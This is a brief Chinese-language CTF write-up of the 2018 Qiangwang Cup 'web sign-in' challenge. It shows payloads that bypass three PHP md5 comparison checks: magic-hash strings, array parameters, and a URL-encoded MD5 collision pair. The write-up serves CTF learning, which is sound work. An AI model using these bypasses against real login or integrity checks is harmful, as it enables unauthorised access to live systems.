web簽到

2018強網杯-Writeup /

第一層：

<!--
    if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
            die("success!");
    }
-->

這里可以用2個字符串繞過

param1=240610708&param2=QNKCDZO

第二層:

<!--
    if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
            die("success!");
        }
-->

使用了強等于，那么使用數組繞過

param1[]=1&param2[]=2
使用了強制字符串轉化
一番谷歌后發現這是去年BKPCTF改的一道題
payload如下:

Param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

Param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

注：上述兩個字符串其md5加密后密文相同。

本文章首發在網安wangan.com 網站上。

GQQQy

資深作者 200 聲望

老年二進制選手，副業虛擬機

點贊

討論數量: 0

只看當前版本

暫無話題~